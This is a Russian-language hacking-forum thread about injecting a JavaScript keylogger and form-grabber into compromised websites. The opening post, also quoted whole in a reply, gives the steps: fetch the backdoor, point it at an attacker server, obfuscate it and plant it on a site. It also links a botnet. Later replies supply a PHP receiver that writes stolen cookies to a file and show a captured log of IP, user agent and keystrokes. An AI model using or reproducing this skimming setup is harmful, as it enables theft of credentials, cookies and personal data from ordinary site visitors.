• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фазинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Javascript backdoor или как сайты следят за пользователями.

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
522
#1
spies.jpg

482 сайта из топа Alex перехватывают, каждое нажатие клавиш, собирают информация о вашем браузере, ширине экрана, раскладки клавиатуры. Чтобы собирать о вас данные они используют javascript код. .По умолчанию скрипты этих компаний записывают все данные, которые пользователи вводят в различные формы, включая ФИО, email-адреса, телефонные номера, номера социального страхования, даты рождения. Более того, реальное число таких сайтов должно намного превышать изученные несколько сотен, так как ресурсы за пределами топ-50000 специалисты вообще не рассматривали.

Но на самом деле можно намного больше. Допустим на скомпрометированным сайте расположены форма регистрации, где просят указать, mail или телефон, само собой логин и пароль ну и допустим номер банковской карты. Так один разработчик вставил бэкдор в 20 000 сайтов. По данным полиции, с помощью своих бэкдоров разработчик похищал чужие пароли и юзернеймы, а затем использовал их, чтобы получить доступ к чужим аккаунтам в социальных сетях и почтовым ящикам. После злоумышленник убеждал друзей и близких своей жертвы перевести ему деньги. Также хакер регистрировал аккаунты на игорных сайтах, используя личные данные жертв, и совершал покупки в интернет-магазинах за чужой счет. Сообщается, что жертвами злоумышленника стали не только частные лица, но и ряд компаний.

Злоумышленник вставляет вредоносный javascript код, который собирает информацию из всех этих форм, записывает каждое нажатие клавиши и передает на удаленный сервер. Полученную информацию он может продать на каком-нибудь форуме. Такие данные стоят намного больше, чем допустим размещение рекламы на взломанном сайте. А если еще и улучшить бэкдор, то можно незаметно заражать каждую машину пользователя, собирать его cookie. Можно получить доступ к аккаунтам соц. сетям или дать ему zip-bomb. Zip-бомба, также известная как Архив Смерти или англ. decompression bomb— архивный файл, который по своей природе обладает разрушающим действием. При распаковке может вызвать крах системы. А теперь перейдем к практики.

Качаем отсюда бэкдор:
Для просмотра контента необходимо: Войти или зарегистрироваться
. Далее везде, где есть http:// дописываем адрес сервера куда передаваться данные. Обфусифицируем код и вставляем на страницу сайта. Проверить работу бэкдора можно самому перейдя на вредоносную страницу. Если все пройдет удачно, то на ваш сервер передастся информацию о вас.

Есть еще один бэкдор, т.е бот. Ссылка: https://github.com/4k-developer/4K-Botnet . Он более функционален и имеет возможность вставлять заголовки, майнить криптовалюту, убивать браузер и еще кучу интересностей.

Для борьбы со слежкой на сайтах есть плагин: ghostery .
 
22.01.2018
36
4
#2
Посмотреть вложение 15560

482 сайта из топа Alex перехватывают, каждое нажатие клавиш, собирают информация о вашем браузере, ширине экрана, раскладки клавиатуры. Чтобы собирать о вас данные они используют javascript код. .По умолчанию скрипты этих компаний записывают все данные, которые пользователи вводят в различные формы, включая ФИО, email-адреса, телефонные номера, номера социального страхования, даты рождения. Более того, реальное число таких сайтов должно намного превышать изученные несколько сотен, так как ресурсы за пределами топ-50000 специалисты вообще не рассматривали.

Но на самом деле можно намного больше. Допустим на скомпрометированным сайте расположены форма регистрации, где просят указать, mail или телефон, само собой логин и пароль ну и допустим номер банковской карты. Так один разработчик вставил бэкдор в 20 000 сайтов. По данным полиции, с помощью своих бэкдоров разработчик похищал чужие пароли и юзернеймы, а затем использовал их, чтобы получить доступ к чужим аккаунтам в социальных сетях и почтовым ящикам. После злоумышленник убеждал друзей и близких своей жертвы перевести ему деньги. Также хакер регистрировал аккаунты на игорных сайтах, используя личные данные жертв, и совершал покупки в интернет-магазинах за чужой счет. Сообщается, что жертвами злоумышленника стали не только частные лица, но и ряд компаний.

Злоумышленник вставляет вредоносный javascript код, который собирает информацию из всех этих форм, записывает каждое нажатие клавиши и передает на удаленный сервер. Полученную информацию он может продать на каком-нибудь форуме. Такие данные стоят намного больше, чем допустим размещение рекламы на взломанном сайте. А если еще и улучшить бэкдор, то можно незаметно заражать каждую машину пользователя, собирать его cookie. Можно получить доступ к аккаунтам соц. сетям или дать ему zip-bomb. Zip-бомба, также известная как Архив Смерти или англ. decompression bomb— архивный файл, который по своей природе обладает разрушающим действием. При распаковке может вызвать крах системы. А теперь перейдем к практики.

Качаем отсюда бэкдор:
Для просмотра контента необходимо: Войти или зарегистрироваться
. Далее везде, где есть http:// дописываем адрес сервера куда передаваться данные. Обфусифицируем код и вставляем на страницу сайта. Проверить работу бэкдора можно самому перейдя на вредоносную страницу. Если все пройдет удачно, то на ваш сервер передастся информацию о вас.

Есть еще один бэкдор, т.е бот. Ссылка: https://github.com/4k-developer/4K-Botnet . Он более функционален и имеет возможность вставлять заголовки, майнить криптовалюту, убивать браузер и еще кучу интересностей.

Для борьбы со слежкой на сайтах есть плагин: ghostery .
Довольно интересно
 
Симпатии: Понравилось DefWolf

OneTrust

Active member
11.05.2017
27
6
#3
У кого-то получилось запустить первую утилиту? Какие логи приходят?
 

Max2

Member
28.06.2017
20
3
#5
Обфусифицируем код и вставляем на страницу сайта
можно поподробней на какой сайт(свой?) и чем и как обфусцировать?

---- Добавлено позже ----

адрес сервера куда передаваться данные
что поднять надо на сервере?
 
Последнее редактирование:

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
522
#6
можно поподробней на какой сайт(свой?) и чем и как обфусцировать?
Допустим вот:
Для просмотра контента необходимо: Войти или зарегистрироваться
. Бэкдор вставляешь на зараженный сайт, а файл который будет принимать запросы на свой сервер или на другой зараженный сайт:
PHP:
<?php
$cook = $_GET['cookie'];
if(isset($cook)){
file_put_contents('1.txt', $cook, FILE_APPEND);
}
?>
 
Последнее редактирование:
Симпатии: Понравилось Max2

Max2

Member
28.06.2017
20
3
#7
Допустим вот:
Для просмотра контента необходимо: Войти или зарегистрироваться
. Бэкдор вставляешь на зараженный сайт, а файл который будет принимать запросы на свой сервер или на другой зараженный сайт:
PHP:
<?php
$cook = $_GET['cookie'];
if(isset(cook)){
file_put_contents('1.txt', $cook, FILE_APPEND);
}
?>
спасибо
 

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
522
#10
Он записывает в файл 1.txt Информацию

---- Добавлено позже ----

Info: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});Win32Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36ruInfo: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});1

---- Добавлено позже ----

1 это клавиша которую я нажал
 
Последнее редактирование:
Симпатии: Понравилось Max2

Max2

Member
28.06.2017
20
3
#11
Он записывает в файл 1.txt Информацию

---- Добавлено позже ----

Info: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});Win32Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36ruInfo: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});1

---- Добавлено позже ----

1 это клавиша которую я нажал
всё понятно СУПЕР
 
Симпатии: Понравилось DefWolf

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
522
#14
У Ondrik8 есть тема, где он использует Javascript + ActiveXObject("Shell.Application"), для загрузки бэкдора. Не забывай, что это уголовно наказуемо
 
Последнее редактирование:
Вверх Снизу